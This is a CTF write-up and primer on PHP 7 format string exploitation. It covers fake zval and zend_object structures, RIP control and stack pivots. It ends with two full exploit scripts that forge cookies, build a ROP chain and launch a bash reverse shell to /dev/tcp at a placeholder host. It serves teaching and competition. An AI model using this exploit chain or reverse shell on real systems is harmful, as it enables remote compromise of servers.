---
# System prepended metadata

title: PHP pwn Primer 1 - Format String Vulnerabilities

---

# PHP pwn Primer 1 - Format String Vulnerabilities

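PHP is a convenient language for developers. But it is an interpreted language built on the Zend virtual machine, with its own syntactic sugar, and nearly every release has brought newly reported vulnerabilities. Because PHP is so widely deployed, studying how its vulnerabilities can be exploited is worthwhile. In this post I use a CTF challenge I wrote myself as an example to record what I learned about PHP exploitation (mainly targeting PHP 7).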

## The basic structure of PHP variables

The basic building block in PHP is the zval. Its `type` field identifies the type of the variable it holds.
```c
// /Zend/zend_types.h
struct _zval_struct {
	zend_value        value;			/* value */
	union {
		struct {
			ZEND_ENDIAN_LOHI_4(
				zend_uchar    type,			/* active type */
				zend_uchar    type_flags,
				zend_uchar    const_flags,
				zend_uchar    reserved)	    /* call info for EX(This) */
		} v;
		uint32_t type_info;
	} u1;
	union {
		uint32_t     next;                 /* hash collision chain */
		uint32_t     cache_slot;           /* literal cache slot */
		uint32_t     lineno;               /* line number (for ast nodes) */
		uint32_t     num_args;             /* arguments number for EX(This) */
		uint32_t     fe_pos;               /* foreach position */
		uint32_t     fe_iter_idx;          /* foreach iterator index */
		uint32_t     access_flags;         /* class constant access flags */
		uint32_t     property_guard;       /* single property guard */
		uint32_t     extra;                /* not further specified */
	} u2;
};

```


The types that each `type` value stands for can be found in `/Zend/zend_types.h`:
```c
/* regular data types */
#define IS_UNDEF					0
#define IS_NULL						1
#define IS_FALSE					2
#define IS_TRUE						3
#define IS_LONG						4
#define IS_DOUBLE					5
#define IS_STRING					6
#define IS_ARRAY					7
#define IS_OBJECT					8
#define IS_RESOURCE					9
#define IS_REFERENCE				10

/* constant expressions */
#define IS_CONSTANT_AST				11

/* internal types */
#define IS_INDIRECT             	13
#define IS_PTR						14
#define _IS_ERROR					15

/* fake types used only for type hinting (Z_TYPE(zv) can not use them) */
#define _IS_BOOL					16
#define IS_CALLABLE					17
#define IS_ITERABLE					18
#define IS_VOID						19
#define _IS_NUMBER					20
```
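Besides `type`, the other field we care about is `value`. For types such as strings, arrays, and objects, it points to the structure that holds the variable's actual data.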
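
To make the layout concrete, here is a minimal Python 3 sketch that packs and unpacks a zval as raw bytes. It assumes a 64-bit little-endian build, where `zend_value` occupies 8 bytes and `u1` and `u2` occupy 4 bytes each; the helper name `pack_zval` and the sample pointer are made up for illustration.

```python
import struct

IS_STRING = 6
IS_OBJECT = 8

def pack_zval(value, type_info, u2=0):
    """Pack a 16-byte zval: 8-byte value, 4-byte u1.type_info, 4-byte u2."""
    return struct.pack("<QII", value, type_info, u2)

# Hypothetical pointer to a zend_object; only the layout matters here.
raw = pack_zval(0x7F0000001000, IS_OBJECT)

value, type_info, u2 = struct.unpack("<QII", raw)
zval_type = type_info & 0xFF  # u1.v.type is the lowest byte of type_info
print(len(raw), hex(value), zval_type)
```

Because `type` is the lowest byte of `u1`, writing the single byte `\x08` at offset 8 is enough to make a block of memory look like an object zval.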

![](https://i.imgur.com/KTNHbAM.png)

Examples are zend_string and zend_object, the latter being used frequently in PHP exploitation:
```c
struct _zend_string {
	zend_refcounted_h gc;
	zend_ulong        h;                /* hash value */
	size_t            len;
	char              val[1];
};
```
```c
struct _zend_object {
	zend_refcounted_h gc;
	uint32_t          handle; // TODO: may be removed ???
	zend_class_entry *ce;
	const zend_object_handlers *handlers;
	HashTable        *properties;
	zval              properties_table[1];
};
```
Note that a `zend_object` structure contains a `handlers` pointer to a `zend_object_handlers` structure.

![](https://i.imgur.com/S5mq5E6.png)

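This is a table of function pointers. Whenever a zend_object is processed (that is, whenever some operation is performed on a PHP object), functions from this table are called.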
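
The field offsets matter later when faking these structures, so here is a small Python 3 sketch that mirrors the two structs with `ctypes` and prints the offsets. It assumes an x86-64 build, models every pointer as a 64-bit integer, and leaves out the trailing `properties_table`; the class names are my own.

```python
import ctypes

class ZendRefcountedH(ctypes.Structure):
    # uint32_t refcount followed by a 32-bit type_info union
    _fields_ = [("refcount", ctypes.c_uint32),
                ("type_info", ctypes.c_uint32)]

class ZendString(ctypes.Structure):
    _fields_ = [("gc", ZendRefcountedH),
                ("h", ctypes.c_uint64),
                ("len", ctypes.c_uint64),
                ("val", ctypes.c_char * 1)]

class ZendObject(ctypes.Structure):
    _fields_ = [("gc", ZendRefcountedH),
                ("handle", ctypes.c_uint32),   # padded up to 8 bytes
                ("ce", ctypes.c_uint64),
                ("handlers", ctypes.c_uint64),
                ("properties", ctypes.c_uint64)]

print("zend_string.val      at", hex(ZendString.val.offset))
print("zend_object.handlers at", hex(ZendObject.handlers.offset))
```

On such a build the `handlers` pointer sits 0x18 bytes into the object, which is the slot a fake zend_object has to fill.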

![](https://i.imgur.com/E3nLBfP.png)

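PHP's basic structures and most of its data live in a heap region managed by PHP's own allocator (backed by mmap), and are allocated and freed with emalloc and efree. I will not cover the allocator's internals in this post, but one simple rule is worth knowing: if a block is allocated and then freed, the next allocation of the same size gets that same block back.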

## Format strings in PHP

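PHP's format string functions add some PHP-specific conversions, such as `%Z`. It treats the corresponding argument as a pointer to a `zval` and outputs that value converted to a `zend_string`.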
```c 
// main/spprintf.c
switch (*fmt) {
	case 'Z': {
		zvp = (zval*) va_arg(ap, zval*);
		free_zcopy = zend_make_printable_zval(zvp, &zcopy);
		if (free_zcopy) {
			zvp = &zcopy;
		}
		s_len = Z_STRLEN_P(zvp);
		s = Z_STRVAL_P(zvp);
		if (adjust_precision && (size_t)precision < s_len) {
			s_len = precision;
		}
		break;
	}
```

```c
// Zend/zend.c
ZEND_API int zend_make_printable_zval(zval *expr, zval *expr_copy) /* {{{ */
{
	if (Z_TYPE_P(expr) == IS_STRING) {
		return 0;
	} else {
		ZVAL_STR(expr_copy, zval_get_string_func(expr));
		return 1;
	}
}
```
```c
ZEND_API zend_string* ZEND_FASTCALL _zval_get_string_func(zval *op) /* {{{ */

...

case IS_OBJECT: {
	zval tmp;
	if (Z_OBJ_HT_P(op)->cast_object) {
		if (Z_OBJ_HT_P(op)->cast_object(op, &tmp, IS_STRING) == SUCCESS) {
			return Z_STR(tmp);
		}
	} else if (Z_OBJ_HT_P(op)->get) {
		zval *z = Z_OBJ_HT_P(op)->get(op, &tmp);
		if (Z_TYPE_P(z) != IS_OBJECT) {
			zend_string *str = zval_get_string(z);
			zval_ptr_dtor(z);
			return str;
		}
		zval_ptr_dtor(z);
...
```
As we can see, if the zval being pointed to is of the object type, the `cast_object` function in the handlers of its zend_object is called.

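So once a format string vulnerability is triggered, all we need is a controllable address in memory. At that address we place a fake zval (type set to `\x08`, value set to the address of a fake zend_object), a fake zend_object (handlers pointing to fake handlers), and fake handlers (cast_object set to the address we want to execute). This gives us control of RIP. On many PHP versions, however, controlling RIP alone is not enough, because RDI is not controllable. For a remote attack (as opposed to the cli), jumping to a one_gadget does not work, so we need to find a suitable gadget to pivot the stack and complete the exploit (this refers to exploitation of 64-bit PHP).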
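
The three fake structures can be sketched in Python 3 as one buffer, followed by a walk over the same pointers that `%Z` would follow. This is an illustration under assumptions: the offsets 0x10 and 0x30 for the object and the handlers, and 0xa8 for the `cast_object` slot, are read off the exploit scripts in this post and hold only for that PHP 7.2 build; the function names and sample addresses are my own.

```python
import struct

IS_OBJECT = 8
HANDLERS_OFF = 0x18      # offset of zend_object.handlers on 64-bit
CAST_OBJECT_OFF = 0xA8   # assumption: cast_object slot in that 7.2 build

def build_fake(base, target):
    """Lay out fake zval, zend_object and handlers in one buffer at `base`."""
    obj, handlers = base + 0x10, base + 0x30
    buf = bytearray(0x30 + CAST_OBJECT_OFF + 8)
    struct.pack_into("<QI", buf, 0x00, obj, IS_OBJECT)            # fake zval
    struct.pack_into("<Q", buf, obj - base + HANDLERS_OFF, handlers)
    struct.pack_into("<Q", buf, handlers - base + CAST_OBJECT_OFF, target)
    return bytes(buf)

def resolve_cast_object(buf, base):
    """Follow zval -> zend_object -> handlers -> cast_object, as %Z would."""
    value, type_info = struct.unpack_from("<QI", buf, 0)
    if type_info & 0xFF != IS_OBJECT:
        return None
    handlers = struct.unpack_from("<Q", buf, value - base + HANDLERS_OFF)[0]
    return struct.unpack_from("<Q", buf, handlers - base + CAST_OBJECT_OFF)[0]

base = 0x7F0000001000                      # hypothetical heap address
fake = build_fake(base, 0x4141414141414141)
print(hex(resolve_cast_object(fake, base)))
```

The overlapping layout keeps the payload compact: the unused fields of the fake object and the unused handler slots are free space that the exploit later fills with its ROP chain.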

Below I walk through the exploitation using `check in`, a challenge I wrote for the vivo 2019 ogeek contest.

## ogeek check_in writeup

![](https://i.imgur.com/r8p7Eaj.png)
The HTML source reveals a file leak:
![](https://i.imgur.com/P8SXk78.png)
![](https://i.imgur.com/cNlQc1F.png)

It turns out the challenge's entire dockerfile and all required attachments are provided.

Reversing test.so and reading index.php reveals the vulnerabilities.
![](https://i.imgur.com/fRQ18p1.png)

![](https://i.imgur.com/30IreHO.png)

### Unserialize vulnerability

`$this->index()` takes `S` from the cookie, passes it through `urldecode`, `base64decode`, `f` (RC4 encryption), and `base64decode` in turn, and feeds the result to `php_var_unserialize`.
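
The decoding chain and its inverse can be sketched in Python 3 as follows. The key `20190712` is the one used in the exploit scripts in this post; the function names are my own, and the sample serialized string is only a placeholder, not the real payload.

```python
import base64
from urllib.parse import quote, unquote

KEY = b"20190712"  # key taken from the exploit scripts in this post

def rc4(key, data):
    """Plain RC4: key scheduling followed by the keystream XOR."""
    sbox = list(range(256))
    j = 0
    for i in range(256):
        j = (j + sbox[i] + key[i % len(key)]) % 256
        sbox[i], sbox[j] = sbox[j], sbox[i]
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + sbox[i]) % 256
        sbox[i], sbox[j] = sbox[j], sbox[i]
        out.append(byte ^ sbox[(sbox[i] + sbox[j]) % 256])
    return bytes(out)

def encode_cookie(serialized):
    """Attacker side: serialized bytes -> value for the S cookie."""
    inner = base64.b64encode(serialized)
    return quote(base64.b64encode(rc4(KEY, inner)))

def decode_cookie(cookie):
    """Server side: urldecode, base64 decode, RC4, base64 decode."""
    inner = rc4(KEY, base64.b64decode(unquote(cookie)))
    return base64.b64decode(inner)

sample = b'O:8:"CppClass":0:{}'  # placeholder object, for the round trip only
cookie = encode_cookie(sample)
print(cookie)
print(decode_cookie(cookie))
```

RC4 is symmetric, so the same `rc4` call both encrypts and decrypts; anyone who recovers the key from test.so can forge arbitrary cookies.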

![](https://i.imgur.com/TuqmvFg.png)

The unserialized object then has `format`, `format_str`, and `other` assigned, in that order.
The whole object is then returned, and `$obj->render()` is called to render it.

![](https://i.imgur.com/hOhzmNP.png)

`format` is forcibly set to `<h1> Wel ... %s ...`, `format_str` is taken from `name` in the unserialized result, and `other` is taken from `other` in the unserialized result.

![](https://i.imgur.com/qdKjdgI.png)



In render(), format, format_str, and other are passed to render_s().

![](https://i.imgur.com/O9DGqoy.png)

format is passed to `zend_vspprintf` as the format string, and the other two are passed as arguments.

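So the key to this challenge is controlling format. Recall that format is hard-coded, but it is assigned before format_str and other are. We can therefore make format_str a reference to format, so that when format_str is modified through name, format is indirectly modified as well.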
```php
$obj->format = &$obj->format_str;
```
This results in a format string vulnerability.
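
The effect of the reference can be modelled with a toy Python 3 sketch in which each property is a cell and a PHP reference is two names sharing one cell. This is only a model of the assignment order described above, not the extension's real code; `Cell`, `extension_assign`, and the sample strings are made up, and the format string is left elided as in the text.

```python
class Cell:
    """Stand-in for a PHP value slot; a reference is two names on one Cell."""
    def __init__(self, value=None):
        self.value = value

def extension_assign(props, name, other):
    """Model of the assignment order: format, then format_str, then other."""
    props["format"].value = "<h1> Wel ... %s ..."  # hard-coded by the extension
    props["format_str"].value = name               # attacker-controlled
    props["other"].value = other                   # attacker-controlled
    return props

# Ordinary object: three independent properties.
plain = {"format": Cell(), "format_str": Cell(), "other": Cell()}
extension_assign(plain, "AAAA%p%p", "payload")

# Crafted object: format and format_str are the same slot.
shared = Cell()
aliased = {"format": shared, "format_str": shared, "other": Cell()}
extension_assign(aliased, "AAAA%p%p", "payload")

print(plain["format"].value)
print(aliased["format"].value)
```

In the ordinary object the hard-coded format survives; in the crafted one the later write to format_str lands in the shared slot and replaces it.
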
### Format string vulnerability

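Following the approach above, we first use `%p` to leak the libc and libphp addresses, then take control of RIP and look for a gadget to pivot the stack. (other is the second argument and its content is controllable, so the fake zval, object, and handlers can be placed in it.)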
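
Turning the `%p` output into usable addresses can be sketched in Python 3 like this. The positions (second pointer for the heap, fourth for libphp) and the offset 0x2d0240 come from the exploit scripts in this post and apply only to that build; the response body and its addresses are invented for the example.

```python
import re

LIBPHP_LEAK_OFFSET = 0x2D0240  # from the exploit in this post, build-specific

def parse_leaks(body):
    """Split consecutive %p outputs ("0x...0x...") into a list of integers."""
    leaks = []
    for piece in body.split("0x")[1:]:
        match = re.match(r"[0-9a-f]+", piece)
        if match:
            leaks.append(int(match.group(0), 16))
    return leaks

# Invented response: four %p values printed back to back.
body = "<h1>AAAAAAAA0x10x7f3a100010000x30x7f3a202d0240</h1>"
leaks = parse_leaks(body)

heap_addr = leaks[1]
libphp_base = leaks[3] - LIBPHP_LEAK_OFFSET
print(hex(heap_addr), hex(libphp_base))
```

Splitting on `0x` rather than matching `0x[0-9a-f]+` is deliberate: the values are printed with no separator, so a greedy hex match would swallow the leading `0` of the next pointer. A base that is not page-aligned is a quick sign that the wrong pointer or offset was used.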

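The register state at the moment we control RIP is shown below. We need to jump somewhere that lets us pivot the stack to a location on the heap that we control. Before looking for gadgets, note that RCX is controllable.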

![](https://i.imgur.com/3pa8ldb.png)

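Ideas for finding a gadget:

1. Exchange registers.
2. PUSH RCX;POP RSP;
3. ret 0x???; (this requires RAX to be cleared, because a non-zero return value leads to zend_error and an abnormal exit, so the second ret needed for ROP is never reached)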

![](https://i.imgur.com/Z7WfKTJ.png)

After writing the challenge, I was lucky enough to find a gadget of the second kind in libphp.
![](https://i.imgur.com/TT8ZSGa.png)
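
To see how this gadget hands control to the payload, here is a toy Python 3 trace of the chain used in the pre-update exploit in this post. It is a sketch under assumptions: RCX is taken to hold the address of the fake zend_object (payload offset 0x10), the gadget addresses are placeholders, and `id` stands in for the real command.

```python
import struct

def trace_pivot(payload, base, rcx, gadgets):
    """Follow `push rcx; pop rsp; ret` through a toy ROP chain."""
    regs = {"rsp": rcx}                      # push rcx; pop rsp

    def pop():
        value = struct.unpack_from("<Q", payload, regs["rsp"] - base)[0]
        regs["rsp"] += 8
        return value

    pc = pop()                               # the pivot gadget's final ret
    while gadgets[pc] != "call_popen":
        if gadgets[pc] == "pop3_ret":
            pop(); pop(); pop()              # skip three qwords
        elif gadgets[pc] == "pop_rdi":
            regs["rdi"] = pop()
        elif gadgets[pc] == "pop_rsi":
            regs["rsi"] = pop()
        pc = pop()                           # every gadget ends in ret
    return regs

BASE = 0x7F0000001000                        # hypothetical heap address
POP3, POP_RDI, POP_RSI, CALL_POPEN, MAGIC = 0x1111, 0x2222, 0x3333, 0x4444, 0x5555
GADGETS = {POP3: "pop3_ret", POP_RDI: "pop_rdi",
           POP_RSI: "pop_rsi", CALL_POPEN: "call_popen"}

def q(value):
    return struct.pack("<Q", value)

payload = (q(BASE + 0x10) + q(8)             # fake zval: value, type
           + q(POP3) + b"A" * 8 + b"B" * 8   # fake object doubles as chain
           + q(BASE + 0x30)                  # handlers pointer (skipped by pop3)
           + q(POP_RDI) + q(BASE + 0xE8)
           + q(POP_RSI) + q(BASE + 0xE0)
           + q(CALL_POPEN)
           + b"C" * 8 * 16
           + q(MAGIC)                        # cast_object slot
           + b"r".ljust(8, b"\x00")
           + b"id\x00")

regs = trace_pivot(payload, BASE, BASE + 0x10, GADGETS)
print({name: hex(value) for name, value in regs.items()})
```

The `pop3_ret` at the start exists only to jump over the handlers pointer, which has to stay inside the fake object for `cast_object` to be reached in the first place.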

But on the day of the contest, when I rebuilt the docker image with no-cache, I found that PHP had been updated and this gadget no longer existed.

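I then found a usable gadget in libc, so the challenge remained solvable after all. The libc address leak is not very stable, though: you have to look through all the leaked addresses for one ending in `aa`.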
```
ROPgadget --binary /lib/x86_64-linux-gnu/libc-2.27.so --depth 30 |grep "push "|grep "pop rsp"

0x0000000000114334 : push qword ptr [rcx] ; rcr byte ptr [rbx + 0x5d], 0x41 ; pop rsp ; ret


```
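
Picking the libc pointer out of several hundred leaked values can be automated. The Python 3 sketch below uses the offset 0x5b9aa from the post-update exploit in this post and keeps only values that yield a page-aligned base; the `0x7f` prefix check is an assumption about typical x86-64 Linux library mappings, and the sample leaks are invented.

```python
LIBC_LEAK_OFFSET = 0x5B9AA  # from the post-update exploit, libc-2.27 specific

def libc_base_candidates(leaks):
    """Return possible libc bases for leaked values that fit the offset."""
    candidates = []
    for addr in leaks:
        base = addr - LIBC_LEAK_OFFSET
        # Assumption: shared libraries are mapped at 0x7f.......... addresses.
        if addr >> 40 == 0x7F and base & 0xFFF == 0:
            candidates.append(base)
    return candidates

# Invented leak list: only the second value fits.
leaks = [0x55D0C0A819AA, 0x7F3A1C25B9AA, 0x7F3A1C25B9AB, 0x7FFD1234]
print([hex(base) for base in libc_base_candidates(leaks)])
```

Requiring a page-aligned base is stricter than looking for a trailing `aa`, since it checks the low 12 bits (`0x9aa`). More than one leaked value can still pass, so the index may need manual adjustment as the comment in the exploit notes.
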
### exp
#### Before the update

```python
from pwn import *
import requests
from urllib import unquote,quote
import base64
import os
from binascii import unhexlify
key = '20190712'
def crypto(string):
    sbox = []
    for i in range(256):
        sbox.append(i)
    j = 0
    for i in range(256):
        j = (sbox[i] + j + ord(key[i%8]))%0x100
        sbox[i],sbox[j] = sbox[j],sbox[i]
    i1 = 0
    i2 = 0
    s = ''
    for i in range(len(string)):
        i1 = (i1 + 1)%0x100
        i2 = (i2 + sbox[i1])%0x100
        sbox[i1],sbox[i2] = sbox[i2],sbox[i1]
        s += chr(ord(string[i]) ^ sbox[(sbox[i1]+sbox[i2])%0x100])
    return s


command = "/bin/bash -c '/bin/bash -i >&/dev/tcp/xxxx/xxx 0>&1'\x00\x00"
target = "127.0.0.1"


burp0_url = "http://"+target+"/index.php?a=bbbbbbbbbbb%00cccccccc"
burp0_cookies = {"PHPSESSID": "769cb13v1vbmusfntcpqs3t3bl"}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", "Referer": "http://172.16.91.148/index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
burp0_data={"username": "admin", "password": ":admiN123:"}
#a = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
#print base64.b64decode(crypto(base64.b64decode(unquote(a.text.split("cookie='S=")[1].split("';location.hre")[0]))))
'''
a.php 

<?php
Class CppClass {
  var $name,$format,$format_str,$other;
}
if($argc<=2){
$obj = new \CppClass;
echo serialize($obj);
}
else
{
        $format = base64_decode($argv[1]);
        $exp = base64_decode($argv[2]);
        $obj = new \CppClass;
        $obj->name = $format;
        $obj->format = &$obj->format_str;
        $obj->other = $exp;
        echo base64_encode(serialize($obj));
}
?>

'''
def f(fmt,exp):
    try:
        b = os.popen("php a.php "+base64.b64encode(fmt)+" "+base64.b64encode(exp)).read()
        burp0_cookies["S"] = quote(base64.b64encode(crypto(b)))
        return requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies).text
    except:
        return 0


format_str = 'AAAAAAAA%p%p%p%p'
exp = "D"*24+"EEEEEEEE"*37
a = f(format_str,exp).replace("<!-- ./html.zip --!>",'')

heap_addr = a.split('0x')[2]
log.success("heap_addr: 0x"+heap_addr)

heap_addr = int('0x'+heap_addr,16)
lib_php_addr = a.split('0x')[4]
lib_php_addr = int('0x'+lib_php_addr,16)-0x2d0240
log.success("lib_php7.2.so base addr : "+hex(lib_php_addr))
magic_addr = lib_php_addr + 0x2e512b # push rcx; pop rsp; ret;
pop3_ret = lib_php_addr + 0xdbb57
pop_rsi = lib_php_addr + 0xdb427
pop_rdi = lib_php_addr + 0xdbb5c
call_popen = lib_php_addr + 0x1C6A71

'''
Generate fake *zval and *zend_object and *zend_object_handlers
Convert fake *zend_object to *zend_string (%Z)
https://github.com/php/php-src/blob/e6f86fb17cd3a2dfe94ca1a0113a23194cb1915a/main/spprintf.c#L401
https://github.com/php/php-src/blob/21b0f444296ac44eadc7ed3474fba5978ec8163d/Zend/zend.c#L356
https://github.com/php/php-src/blob/7f994990eab4ffc3eb8cddca413dc4bcd03e3457/Zend/zend_operators.c#L878
We can control PC now.
Stack pivot (magic_addr) => ROP => popen(command,"r");
'''

format_str = "AAAAAAAA%p%Z%p%p"
exp = p64(heap_addr+0x10) # heap_addr
exp += p64(0x8)           # heap_addr+0x8
exp += p64(pop3_ret)      # heap_addr+0x10
exp += "AAAAAAAA"         # heap_addr+0x18
exp += "BBBBBBBB"         # heap_addr+0x20
exp += p64(heap_addr+0x30)
exp += p64(pop_rdi)
exp += p64(heap_addr+0xe8)
exp += p64(pop_rsi)
exp += p64(heap_addr+0xe0)
exp += p64(call_popen)
exp += "CCCCCCCC"*16
exp += p64(magic_addr)
exp += "r"+"\x00"*7
exp += command.ljust(80,'\x00')
exp += "AAAAAAAA"
a = f(format_str,exp)
log.success("exploit ok")
```
#### After the update

```python
from pwn import *
import requests
from urllib import unquote,quote
import base64
import os
from binascii import unhexlify
key = '20190712'
def crypto(string):
    sbox = []
    for i in range(256):
        sbox.append(i)
    j = 0
    for i in range(256):
        j = (sbox[i] + j + ord(key[i%8]))%0x100
        sbox[i],sbox[j] = sbox[j],sbox[i]
    i1 = 0
    i2 = 0
    s = ''
    for i in range(len(string)):
        i1 = (i1 + 1)%0x100
        i2 = (i2 + sbox[i1])%0x100
        sbox[i1],sbox[i2] = sbox[i2],sbox[i1]
        s += chr(ord(string[i]) ^ sbox[(sbox[i1]+sbox[i2])%0x100])
    return s

command = "/bin/bash -c '/bin/bash -i >&/dev/tcp/xxx/xxx 0>&1'\x00"
burp0_url = "http://47.112.98.102:14141/index.php?a=bbbbbbbbbbb%00cccccccc"
burp0_cookies = {"PHPSESSID": "769cb13v1vbmusfntcpqs3t3bl"}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", "Referer": "http://172.16.91.148/index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
burp0_data={"username": "admin", "password": ":admiN123:"}
#a = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
#print base64.b64decode(crypto(base64.b64decode(unquote(a.text.split("cookie='S=")[1].split("';location.hre")[0]))))

def f(fmt,exp):
    try:
        b = os.popen("php a.php "+base64.b64encode(fmt)+" "+base64.b64encode(exp)).read()
        burp0_cookies["S"] = quote(base64.b64encode(crypto(b)))
        return requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
    except:
        return 0


format_str = 'AAAAAAAA'+"%p"*700
exp = "D"*24+"EEEEEEEE"*37
a = f(format_str,exp).text.replace("<!-- ./html.zip --!>",'')
#print a

heap_addr = a.split('0x')[2]
log.success("heap_addr: 0x"+heap_addr)

heap_addr = int('0x'+heap_addr,16)
lib_php_addr = a.split('0x')[4]
lib_php_addr = int('0x'+lib_php_addr,16)-0x2d0240-0x3c0
log.success("lib_php7.2.so base addr : "+hex(lib_php_addr))
libc_addr = a.split('0x')
libc_addr = libc_addr[-1] # libc addr end with 'aa', you need to adjust the index according to the actual situation.
libc_addr = int("0x"+libc_addr,16)-0x5b9aa
log.success('libc_addr: ' + hex(libc_addr))
magic_addr = libc_addr + 0x114334 #push [rcx];...;pop rsp;
log.success('magic_addr: ' + hex(magic_addr))
pop_ret = lib_php_addr + 0xdb427
pop_rsi = lib_php_addr + 0xdb427
pop_rdi = lib_php_addr + 0xdbb5c
call_popen = libc_addr + 0x80930

format_str = "AAAAAAAA%p%Z%p%p"+"%p"*(700-4)
exp = p64(heap_addr+0x10) # heap_addr  (rbx)
exp += p64(0x8)           # heap_addr+0x8
exp += p64(heap_addr+0x20)# heap_addr+0x10 (rcx)
exp += "AAAAAAAA"         # heap_addr+0x18
exp += p64(pop_ret)       # heap_addr+0x20
exp += p64(heap_addr+0x30)
exp += p64(pop_rdi)
exp += p64(heap_addr+0xe8)
exp += p64(pop_rsi)
exp += p64(heap_addr+0xe0)
exp += p64(call_popen)
exp += "CCCCCCCC"*16
exp += p64(magic_addr)
exp += "r"+"\x00"*7
exp += command.ljust(80,'\x00')
exp += "AAAAAAAA"
a = f(format_str,exp)
log.success("exploit ok")

```